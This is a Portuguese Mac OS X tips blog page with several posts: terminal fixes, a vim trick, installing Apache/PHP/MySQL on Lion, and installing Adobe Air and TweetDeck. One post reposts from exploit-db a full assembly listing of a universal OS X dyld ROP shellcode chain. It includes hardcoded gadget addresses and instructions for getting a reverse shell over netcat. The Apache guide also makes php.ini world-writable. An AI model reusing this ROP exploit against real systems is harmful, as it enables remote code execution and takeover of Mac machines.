Browsed by
Tag: macosx

‘xterm-256color’: unknown terminal type no mac os x Lion, Mac os x mountain ou mac os x snow leopard

‘xterm-256color’: unknown terminal type no mac os x Lion, Mac os x mountain ou mac os x snow leopard

Se este erro ocorre com você na tentativa de acesso ao terminal de um servidor Ubuntu, Debian, Mint ou qualquer outro Debian Based usando Mac os X e recebe o erro ‘xterm-256color’: unknown terminal type, entre no servidor de destino aonde o terminal conecta e use o seguinte comando:

apt-get install ncurses-term -y

Isso vai instalar o pacote que faltava.

Interessante que se o erro não for corrigido, por exemplo, um comando inportante como top ou screen não funcionam :(.

Em plataformas Red Hat não rola isto.

OSX universal ROP shellcode Testado no SNOW LEOPARD

OSX universal ROP shellcode Testado no SNOW LEOPARD


; universal OSX dyld ROP shellcode
; tested on OS X 10.6.8
;
; if you don't want to compile, copy stage0 code from precompiled.txt
; and append your normal shellcode to it.
;
; usage:
; - put your 'normal' shellcode in x64_shellcode.asm
; - make
; - ./sc
;
; if you want to test:
; - uncomment lea rsp, [rel rop_stage0] / ret
; - make
; - nc -l 4444
; - ./sc
; - you should get a shell over nc
;
; see my blog, if you want to know how this works:
; http://gdtr.wordpress.com
;
; greets to Jacob Hammack, for his reverse tcp shellcode (hammackj.com).
;
; pa_kt
; twitter.com/pa_kt

extern _printf

global _main

;————————————————–
;- DATA
;————————————————–
section .data

rw_area equ 0x00007FFF5FC50000
rwx_area equ rw_area+0x1000
vm_prot equ 0x00007FFF5FC0D356
fake_stack equ rw_area+0x2000
fake_frame equ fake_stack+0x100
r12_zero equ rw_area-0x1000

rax_off equ rw_area-8
rbx_off equ rw_area+8-8
rcx_off equ rw_area+0x10-8
rdx_off equ rw_area+0x18-8
rsi_off equ rw_area+0x28-8
rbp_off equ rw_area+0x30-8
rsp_off equ rw_area+0x38-8
r8_off equ rw_area+0x40-8
r12_off equ rw_area+0x60-8

pop_rdi equ 0x00007FFF5FC24CDC
pop_rbx equ 0x00007FFF5FC23373
store_reg equ 0x00007FFF5FC24CE1
set_regs equ 0x00007FFF5FC24CA1

c_rwx equ 7
c_size equ 0x1000
c_addr equ rwx_area
c_set_max equ 0

dbg_ret equ 0x00007FFF5FC24C4B

; copy shellcode to RWX area
; size = 0x1000
stub:
lea rsi, [r15+saved_rsp_off+copy_stub_size+rop_post_size]
xor rcx, rcx
inc rcx
shl rcx, 12 ;rcx = 0x1000
lea rdi, [rel normal_shellcode]
rep movsb
;int 3
normal_shellcode:

stub_size equ $-stub

; order is important
rop_pre dq pop_rdi, rcx_off, pop_rbx, c_set_max, store_reg,
dq pop_rdi, rdx_off, pop_rbx, c_size, store_reg,
dq pop_rdi, rsi_off, pop_rbx, c_addr, store_reg,
dq pop_rdi, rbp_off, pop_rbx, fake_frame, store_reg,
dq pop_rdi, rsp_off, pop_rbx, fake_stack, store_reg,
dq pop_rdi, r8_off, pop_rbx, c_rwx, store_reg,
dq pop_rdi, r12_off, pop_rbx, r12_zero, store_reg,

; set fake stack
dq pop_rdi, fake_stack+8-8, pop_rbx, vm_prot, store_reg,

; set fake frame (return address -> rwx page)
dq pop_rdi, fake_frame-8-0x38, store_reg,
saved_rsp:
dq pop_rdi, fake_frame+8-8, pop_rbx, rwx_area, store_reg,

rop_pre_size equ $-rop_pre
saved_rsp_off equ $-saved_rsp-8

rop_post dq dbg_ret

; set all regs and jump to vm_prot
dq pop_rdi, rw_area, set_regs
; marker
; dq 0x1111111111111111

rop_post_size equ $-rop_post

x64_shellcode: incbin “x64_shellcode”
x64_shellcode_size equ $-x64_shellcode

hello db “test”, 0
fmt db “\x%02x”,0

section .bss

rop_stage0 resq 100
copy_stub resq ((stub_size+7)/8)*5
copy_stub_size equ $-copy_stub

;————————————————–
;- CODE
;————————————————–
section .text

prep_stub:

mov rcx, (stub_size+7)/8
mov rsi, stub
mov rdi, copy_stub
mov rbx, rwx_area-8
go:
mov rax, pop_rdi
stosq
mov rax, rbx
stosq
mov rax, pop_rbx
stosq
movsq
mov rax, store_reg
stosq
add rbx, 8
loop go
ret

make_stage0:
mov rsi, rop_pre
mov rdi, rop_stage0
mov rcx, rop_pre_size
rep movsb

mov rsi, copy_stub
mov rcx, copy_stub_size
rep movsb

mov rsi, rop_post
mov rcx, rop_post_size
rep movsb

mov rsi, x64_shellcode
mov rcx, x64_shellcode_size
rep movsb

ret

print_it:
push rbp
mov rbp, rsp

mov rcx, rop_pre_size + copy_stub_size + rop_post_size + x64_shellcode_size
lea rsi, [rel rop_stage0]
xor rax, rax
one_char:
lodsb
push rsi
push rcx
mov rsi, rax
mov rdi, qword fmt
xor rax, rax
call _printf
pop rcx
pop rsi
loop one_char

leave
ret

_main:
push qword rbp
mov rbp, rsp

call prep_stub
call make_stage0

call print_it

;lea rsp, [rel rop_stage0]
;ret

leave
ret

Fonte: http://www.exploit-db.com/exploits/17564/

Como remover animações de novas janelas no Mac Os X Lion

Como remover animações de novas janelas no Mac Os X Lion

Atenção galera do bem, mais uma dica simples e rápida e de última hora ;P, se você está afim de desativar animações das novas janelas no seu maczão faça o seguinte, abra o terminal (vide abaixo):

abrir terminal UNIX no mac
abrir terminal UNIX no mac

Dentro dele use o seguinte comando

Pronto, depois disso é só alegria :P.

Bye bye!

Se quiser voltar como antes digite:

Como exibir a pasta Library do seu Home no Mac Os X Lion

Como exibir a pasta Library do seu Home no Mac Os X Lion

E não é que a danada da Apple sumiu com a pasta library do home user?
Essa dica é simples e vale para ambientes Mac Os X Lion (Hackintosh incluso) 10.7.x.

Existem 2 formas de exibir a pasta, só que, uma é monótona, outra já é mais hard, porém resolve de imediato.

Faça o seguinte, abra o terminal do seu Lion, conforme imagem abaixo:

abrir terminal UNIX no mac
abrir terminal UNIX no mac

Pronto, assim que o terminal for aberto digite:

chflags nohidden ~/Library

 

Pronto! Deve estar acessível a pasta Library para você sem qualquer gambiarra.

Você pode abrir pelo finder, digitando ~/Library/, mas não é mais simples remover a ocultação da pasta?

 

Abraços galera e bons estudos/trabalhos para vocês.

AppUnix (Top Unix-Like Site)

Como remover caracteres ^M de arquivos usando VIM/VI (vale para qualquer UNIX-like)

Como remover caracteres ^M de arquivos usando VIM/VI (vale para qualquer UNIX-like)

Bom, galera, quem aqui nunca abriu um arquivo no console que apresentou caracteres ^M?
Normalmente essas pragas aparecem ou com o Dreamweaver ou com Word (cópia) – Área de Transferência, depois os caras costumam enviar por ftp e daí já sabe né? Se abrir o arquivo via console tá lá a praga!

Bem, a dica que nós do AppUnix vamos dar é simples, porém eficaz.

Abrindo seu vi/vim (no exemplo abaixo iremos dar o nome do arquivo como sendo crash.php):

vim crash.php

Assim que o arquivo for aberto o vi/vim estará em modo de comando, para ativar execuções aperte “:” (literalmente os 2 pontos SEM ASPAS) e digite o seginte %s/ (percentual, depois, s e depois / )  e em seguida aperte CTRL+V e CTRL+M e por fim digite //g

Na linha de execução do vi/vim vai aparecer literalmente isso aqui abaixo:

:%s/^M//g

Apertamdo ENTER ele vai remover toda a praga dos caracteres ^M.

Curtiu?
SHARE NELE!

Abraços galera.

Como atualizar seu Mac Os X Lion de forma simples

Como atualizar seu Mac Os X Lion de forma simples

Bom, pessoALL, estamos colocando esse simples artigo no ar para que possa ajudar pessoas que tem dúvidas/medo de atualizar seu Mac Os X (normalmente isso acontece com quem tem hackintosh).

Esta semana que passou publicamos um artigo sobre a estabilidade pós update do mac os x lion, você pode conferir aqui, o link mostra que não há problemas em atualizar seu hackintosh para 10.7.1 (caso esteja na 10.7.0).

Bom, este artigo vai mostrar como atualizar seu mac de forma MUITO simples.
Vamo que vamo?

Abrir updates do MAC OS X LION
Abrir updates do MAC OS X LION

Clicando no menu principal (Aquela mação linda que fica no canto esquerdo superior do seu Desktop (Apple chama o trem de mesa, pode? [lol])

Feito isto, clicando em ATUALIZAÇÃO DO SOFTWARE ele vai abrir aquela caixa de diálogo central e irá fazer busca por update.

Lembre-se de estar conectado na internet com o Mac que você quer atualizar.

Assim que terminar a busca por updates a mesma caixa de diálogo vai mostrar o que precisa ser atualizado, veja abaixo:

Mostrar Detalhes
Mostrar Detalhes

Nós do AppUnix sempre gostamos de observar DETALHES da update (a Apple não vai roubar seu pc, lol, não precisa olhar), mas, se você for cabreiro pode clicar em detalhes.
No nosso caso só tinha 1 update disponível, a qual marcamos e instalamos numa boa, vejam:

Instalar updates marcadas
Instalar updates marcadas

Assim que clicar em Instalar 1 Item (se marcar mais vai ser exibido Instalar X itens). A Aparência da instalação é simples e mostra uma barra de progresso, veja as imagens abaixo:

Progresso de instalação das updates
Progresso de instalação das updates

Agora veremos a conclusão da update, veja abaixo:

Status de completo (update)
Status de completo (update)

Antes de concluirmos nosso arti queremos lhe notificar que algumas updates críticas (de segurança) requerem o reboot da máquina, se for uma tela aparecerá mandando reiniciar o PC, reinicie sem problemas.
Veja bem, se houver erro pós reboot poderá ocorrer a tela abaixo:

erro no hack
erro no mac

Se este tipo de erro ocorrer basta um simples reboot e o sistema de inicialização vai corrigir o erro de permissões/grupos informado acima.

RESSALTAMOS que em caso de ambientes Hackintosh tome muito cuidado com updates de firmware, pois elas podem ferrar seu ambiente e tchau mac :(.

Desejamos-lhes um excelente final de semana.
Se gostar do artigo dê share, recomende, comente…

Abração galera.
Att: Portal AppUNIX

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

Este artigo vai parecer muito com a instalação do apache, php e mysql sob mac os x snow leopard, porém existem algumas particularidades que precisam ser detalhadas. Antemão parte do artigo do mamp sob snow leopard será copiado, depois, iremos detalhar pontos MUITO importantes para que tudo funcione corretamente. Estamos testando em um hackintosh LION (10.7.1), literalmente current (updates mais novas).

Vamos lá:

No outro artigo, para habilitarmos o apache usamos o comando com poder de root (sudo) para ativar o web server, mas agora isto só é permitido sem stress via Preferências do Sistema -> Sharing (compartilhamento) e marcando o Web Server (compartilhamento de arquivos web), lhe mostraremos imagens abaixo:

Abrindo o menu de sharing para apache
Abrindo o menu de sharing para apache
Clicando em compartilhamento de páginas web
Clicando em compartilhamento de páginas web

Note acima que clicamos em COMPARTILHAMENTO junto as preferências de sistema e em seguida marcamos o compartilhamento do apache (páginas web). Toda mudança significativa do mac faz controle de permissões (segurança), por isso coloque seu login e senha para autorizar a mudança.

Feito isto teremos de entrar no conf do apache para liberarmos o php5, veja os passos que diremos.

Nosso segundo ponto e muito importante é entrar no arquivo de configuração do apache 2 afim de habilitarmos o suporte ao PHP, vamos por a mão na massa? Estamos usando o VIM, um editor muito eficaz e leve (todos que já amaram o vi um dia com certeza amam/amarão o vim):

Little-oaks-appunixlabs:~ sudo vim /etc/apache2/httpd.conf

 

Dentro deste arquivo devemos remover o comentário da linha abaixo:

LoadModule php5_module libexec/apache2/libphp5.so

Recomendo que aperte a tecla / no vim e digite php5, você já vai cair em cima da linha a ser descomentada, em seguida, no sinal de libra (#), caminhe até ele e aperte x
Isto nos deixará com suporte ao PHP, depois basta apertar ESC e digitar isto:
:wq!
Assim que pressionar ENTER o arquivo será salvo.
Vamos explicar o por que de :wq!

: representa comando para o arquivo
W representa ESCREVER
Q representa QUIT (sair)
! representa EXECUTAR as instruções informadas

Para finalizarmos o suporte ao php precisamos rodar o seguinte comando:

Little-oaks-appunixlabs:~ sudo apachectl restart

É mania de todos criar um arquivo com a função phpinfo() contida nele, porém, se fizermos isso “de cara” o apache vai exibir muitos warnings (interpretados pelo php) por questões de permissões e de existência do arquivo php.ini. Para sanarmos isto deveremos fazer o seguinte:

Little-oaks-appunixlabs:~ cd /etc
Little-oaks-appunixlabs: sudo cp php.ini.default php.ini
Little-oaks-appunixlabs: sudo chmod 666 php.ini

Estamos copiando o php.ini default do /etc (área de arquivos de configurações em Unix-like systems) e atribuindo permissões 666 (dono pode ler e escrever no arquivo, grupo também e demais também).
No arquivo php.ini temos de localizar o trecho aonde o TimeZone é identificado (mas está comentado). É muito importante mudar esta linha e ajustarmos nosso timezone corretamente, pois isto nos dará um horário adequado. Para isto devemos proceder da seguinte forma:
Little-oaks-appunixlabs: sudo vim php.ini
Em seguida aperte a tecla / para localizar um termo, informe o seguinte date.timezone, isto lhe deixará na linha acima da que precisamos mudar. Descomente a linha abaixo para que fique assim:
date.timezone =

Você removerá o ; apertando x em cima dele. Para deixarmos o vim em modo de edição de arquivos precisamos apertar a tecla i, isto nos dará poder de editar o arquivo (saindo de modo comando).
Agora iremos colocar depois do = o seguinte:
America/Sao_Paulo
Então o resultado final será —> date.timezone = America/Sao_Paulo
Dê ESC e digite
:wq!
Aperte ENTER e terá o arquivo salvo.

 

As vezes você pode estar se perguntando:

Poxa, mas meu timezone não tem nada a ver com o de Sampa, o que faço?
Relaxa, rapá! A galera do Appunix pensou em você! Abaixo segue a lista de timezone da América:
http://www.php.net/manual/en/timezones.america.php

Se mesmo assim não lhe agradar você pode usar os globais:
http://www.php.net/manual/en/timezones.others.php

Mas é impossível você não se agradar dos timezones da América, são repletos.
Os mais comuns que são usados são:
America/Porto_Velho
America/Noronha
America/Rio_Branco
America/Recife
America/Sao_Paulo
America/Porto_Acre
Mas escolha o que mais lhe agradar.

Assim que decidir qual seu TimeZone você deve reiniciar o apache para reler o php.ini e ativar o negócio:
Little-oaks-appunixlabs: sudo apachectl restart

Agora precisamos instalar o Mysql 5 para que possa trabalhar da forma que almejamos.
Para irmos direto ao ponto acesse o link abaixo:
http://dev.mysql.com/downloads/mysql/5.1.html#macosx-dmg
Se cuide para baixar a versão ideal para você.
Aí é 64 bits? Não sabe como é? Quer saber como seu Mac Os X LION está operando? Clique na maça, depois clique em Sobre Este MAC, em seguida clique em Software (Categoria) e procure pela linha Kernel de 64-bit e Extensões: Sim (conforme a foto abaixo):

como ver informações do seu mac os x
como ver informações do seu mac os x

Caso seja Sim é 64 bits (x86_64), então baixe o pacote para 64 bits.
Vamos simbora?
Baixe o arquivo x86_64 no formato DMG.

baixar pacote mysql 64 bits (DMG)
baixar pacote mysql 64 bits (DMG)

baixar pacote mysql 64 bits (DMG)

Quando você clicar no formato DMG automaticamente o site da Mysql vai te convidar a logar-se lá com eles, mas basta prestar a atenção (conforme imagens abaixo) para não precisar perder tempo com esta burocracia, se você quer baixar direto (melhor Né?) basta fazer o seguinte, clique no link abaixo:
HTTP://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.58-osx10.6-x86.dmg/form/http://mysql.cce.usp.br/
Deixa o download terminar siga os passos das fotos abaixo (literalmente instalar o mysql e seu ícone), Devemos concluir os passos extras para adição do Mysql como sendo parte do painel administrativo, para isto siga os passos abaixo:

passo1
passo1

 




















Temos de focar em um ponto em comum.

Temos um script na pasta de download que abrimos (do MYSQL).
Veja o seguinte, MYSQL.PREFPANE é um script que serve para adicionar o script (ícone) de inicialização do MYSQL dentro das preferências do sistema, por isso DEVEMOS executar ele sim, autorizando-o com a senha do usuário. (sem isso teremos de inicializar na mão com o comando mysqld (VIXE, mac é praticidade RAPÁ!)






Feito isto iremos confirmar se o mysql está rodando com o seguinte comando (dentro do terminal):

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql –user=little_oak

Substitua little_oak por SEU_USUÁRIO.

Isto fará com que você esteja dentro do mysql (Via terminal).

Veja como abrir o terminal:

Façamos o seguinte, clique em terminal (veja a imagem abaixo):

como abrir terminais no mac os x
como abrir terminais no mac os x

como abrir terminais no mac os x

Feito isto iremos reiniciar o apache 2 para garantir que o nosso servidor está integrando literalmente tudo, faremos com o seguinte comando:

Little-oaks-appunixlabs: sudo apachectl restart

Para conferirmos tudo vamos entrar dentro da nossa pasta pessoal, na pasta Sites e criar um arquivo chamado index.php. Dentro dele iremos colocar o seguinte (ISTO EM /Library/WebServer/Documents):
Ou seja -> sudo vim /Library/WebServer/Documents/index.php

< ?php phpinfo(); ?>

 

Quando citamos a parte do mysql, praticamente contorna a viagem de redefinir a senha de root. Se dermos ouvidos ao Mágico de OZ e inventarmos redefinir senhas vamos brincar com isso ó:

Mac-Pro-de-little-oak:etc little_oak$ sudo /usr/local/mysql/bin/mysqld –skip-grant-tables –user=root

grant all…

flush privileges e talz, NÃO PRECISA DISSO, o mac entende que você é um cara que é punk no sistema, que só dá sudo quando sabe o que tá fazendo.

Para conferir como alterar a senha de root do mysql basta clicar no nosso artigo de como redefinir a senha de root no mysql dentro do mac os x lion sem complicações.

PONTO EXTRA:

Como a galera está falando muito de MCRYPT no Mac Os X Lion, o path padrão dele é /usr/share/file/magic/mcrypt
, se quiser descomente a linha do mcrypt no php.ini e mande ficha.

 

Uma coisa massa, se você quer ver a documentação do apache meta bala em http://localhost/manual/, veja a imagem abaixo:

 

manual do apache
manual do apache

 

Se você curtiu esse post dê share :P

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

Bom, pessoal, nós do app gostaríamos de detalhar algo.
NÃO precisa ter senha de root para operar o mysql, isto dá-se em detrimento ao poder de root, porém com certas restrições que cada usuário do sistema possui.

Se eu quiser entrar no mysql para criar base de dados e trabalhar com o bd (após seguir nosso how to de instalação do apache, php, e mysql no mac os x lion ou instalação do apache, php, e mysql no mac os x snow leopard

mysql
mysql

) basta fazer o seguinte:

Mac-Pro-de-little-oak:etc little_oak$ sudo /usr/local/mysql/bin/mysql –user=little_oak

Pronto, você precisa lembrar que –user=little_oak deve ser susbsituído por –user=usuário_do_SEUMAC

Depois disso trabalhe normalmente.

Perceba uma coisa forte, o MAC OS X não precisa de root para fazer as coisas (dentro do mysql), ele já sabe que você, usando sudo É O CARA, por isso basta rodar este comando no terminal:

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql –user=little_oak

Troque o little_oak por seu usuário. Depois disso é só alegria.

Abraços galera e clique em SHARE, please!

Como instalar Adobe Air mais recente + TweetDeck no Mac Os X Lion

Como instalar Adobe Air mais recente + TweetDeck no Mac Os X Lion

É bem verdade que com os recursos do Flex dá para ser feito um monte de coisas bacanas. Muitos já devem conhecer a ferramenta TweetDeck (a qual já até citamos em outro post, porém para Android, caso queira companhar basta clicar no top 2011 aplicativos para android). Neste post iremos mostrar como instalar de forma ultra blaster simples o Adobe Air e em seguida como instalar o TweetDeck. Os passos são simples e foram feitos literalmente em um sistema operacional Mac Os X Lion.

Como instalar Adobe Air no Mac Os X?

Vamos lá!

Primeiro passo que devemos fazer é acessar o site da adobe para baixar o pacote oficial direto do site. Usamos uma simples tática, entrando no site da Google e colocando Download Adobe Air. O Site em si, assim que clicado pela url fornecida ao google já checa os cabeçalhos e de cara lhe redireciona para o Link de download para Osx, ou seja, arquivo de download vem no formato DMG.

Se você quiser o Link que usamos (talvez, daqui alguns dias, com os próximos releases este já poderá não estar mais acessível. Caso ainda assim queira:

http://get.adobe.com/br/air/thankyou/?installer=Adobe_AIR_2.7.1_for_MacOS_X

buscando pela google o adobe air
buscando pela google o adobe air

Veja que estamos mostrando literalmente como fizemos via texto ou por imagem (há quem afirme que uma imagem fala mais que mil palavras :P ).

Acessando o download na Adobe
Acessando o download na Adobe

Perceba que clicando no link da adobe de download ele cai na página acima. Quando clicamos em download o redirecionamento vai para o link que citamos que pode perder sua validade (ele se basea no versionamento e não no nome canonical de download adobe air for mac, por exemplo).

Salvando o formato DMG no disco
Salvando o formato DMG no disco

Esta parte já começa a fircar interessante. Como podem perceber estamos baixando o Adobe Air em formato DMG para o disco.

Confirmando a execução do adobe air install
Confirmando a execução do adobe air install

Agora iremos confirmar a instalação do Adobe Air.

Confirmando a instalação do adobe air
Confirmando a instalação do adobe air

Devemos dizer que iremos abrir o arquivo baixado.

Ideal mesmo é que abramos a pasta aonde ele foi salvo no download e cliquemos em cima do arquivo dmg para rodar logo o instalador.

Abrindo o dmg do adobe air install
Abrindo o dmg do adobe air install

Veja que ao abrir o dmg ele mostra literalmente o instalador do adobe air, devemos prosseguir clicando duas vezes sobre este arquivo vermelhinho para o instalador começar a rodar.

Confirmando a execução do arquivo web adobe air install
Confirmando a execução do arquivo web adobe air install

Confirmando a execução iremos para a tela a seguir:

Confirmar instalação do adobe air
Confirmar instalação do adobe air

Veja que no meu caso havia uma versão bem ultrapassada do adobe air instalada, nesta hora ele pede confirmação para ATUALIZAR, se este for seu caso, basta seguir, do contrário, se não havia adobe air ele sugere instalar. No passo da aceitação ele segue literalmente padronizado, dizendo instalar ou atualizar o resto é idêntico. Devemos confirmar aceitando a instalação/atualização.

Autorize a instalação com seu login e senha mestra
Autorize a instalação com seu login e senha mestra

Autorizando com nosso usuário e senha iremos prosseguir com a instalação.

Progresso da instalação do adobe air no mac os x lion
Progresso da instalação do adobe air no mac os x lion

Veja acima o progresso da instalação ocorrendo tranquilamente.

Finalizando a instalação do adobe air
Finalizando a instalação do adobe air

Agora finalizamos a instalação do adobe air.

Como instalar o TweetDeck?

Vamos lá!

Buscando o TweetDeck
Buscando o TweetDeck

Agora iremos instalar o TweetDeck de forma tranquila.

A forma mais eficaz é fazer igual fizemos acima. Acessando o GOOGLE e escrevendo TweetDeck automaticamente temos o site oficial.

Caso queira acessar direto não perca tempo :P, clique aqui -> http://www.tweetdeck.com/desktop/

Se clicar no link acima já caímos na parte que nos interessa, do contrário acessaremos o site do tweetdeck e teremos de clicar em desktop, veja as 2 fotos:

Site Oficial do TweetDeck
Site Oficial do TweetDeck
TweetDeck para Desktop
TweetDeck para Desktop

Veja que o tweetdeck é uma ferramenta oficial do Twitter, por isso tranquilizesse quanto ao seu uso. (milhares de users aprovam :P )
Clicando no link de download do site iremos instalar tranquilamente o TweetDeck, veja a imagem abaixo:

Clique em Download NOW
Clique em Download NOW

Clicando em Download now ele automaticamente utiliza recursos do adobe air instalado em seu desktop. Assim que chamamos clicando ele automaticamente prepara o download e instalação, veja:

Preparando a instalação do TweetDeck 2011
Preparando a instalação do TweetDeck 2011

Vamos dando prosseguimento:

Instalando o TweetDeck confirmando
Instalando o TweetDeck confirmando

Agora iremos prosseguir novamente. Confirme a instalação avançando mais esta etapa acima.

Progresso do TweetDeck
Progresso do TweetDeck

Os passos acima confirmam o download do tweetdeck via adobe air. Agora iremos finalizar a instalação do mesmo seguindo as imagens abaixo:

Confirmando instalação no disco
Confirmando instalação no disco

Vamos encerrar isso ou não? Veja os passos abaixo:

Concluindo a instalação do tweetdeck
Concluindo a instalação do tweetdeck

Pronto. Assim que concluir ele já vai pedir para autorizar o Tweetdeck pois foi baixado da internet (confirme imagem abaixo):

devemos abrir o tweetdeck
devemos abrir o tweetdeck

 

Pronto.

Veja aonde o danado fica no menu:

menu com tweetdeck (aplicativos)
menu com tweetdeck (aplicativos)

Gostou? Salvou seu dia? Então comente este artigo!

Achou massa? Compartilhe!

Se não gostou também critique.

Atenciosamente

4PPUN1X (l4b m41s p1r4d0 de T1).

Como descobrir qual processador roda no seu Mac Os X de forma simples.

Como descobrir qual processador roda no seu Mac Os X de forma simples.

Galera, vamos rodar simples comandos para colhermos informações sobre nossos macs, ok?

Primeiro teremos de abrir nosso terminal, para isto clique em Aplicativos-> Utilitários -> Terminal:

abrir terminal UNIX no mac
abrir terminal UNIX no mac

Dentro do terminal você digitara os seguintes comandos:

 

Little-oaks-iMac:~ little_oak$ sysctl -n machdep.cpu.brand_string

A saída deve parecer com esta da imagem abaixo (que é Intel(R) Pentium(R) Dual CPU E2160 @ 1.80ghz —> Perceba que varia de cada processador, com certeza o seu deve ser core i5 e etc):

Lendo info da CPU
Lendo info da CPU

Temos outra alternativa VIÁVEL :P, bora ver?

 

Little-oaks-iMac:~ little_oak$ system_profiler | grep Processor

A saída deve se parecer muito com:

Processor Name: Intel Core 2 Duo
Processor Speed: 1.8 GHz
Number Of Processors: 1

Lendo info da CPU EXTRA
Lendo info da CPU EXTRA

Curtiu?

Use uma mágica chamda SHARE!

:P

 

Fonte: http://osxdaily.com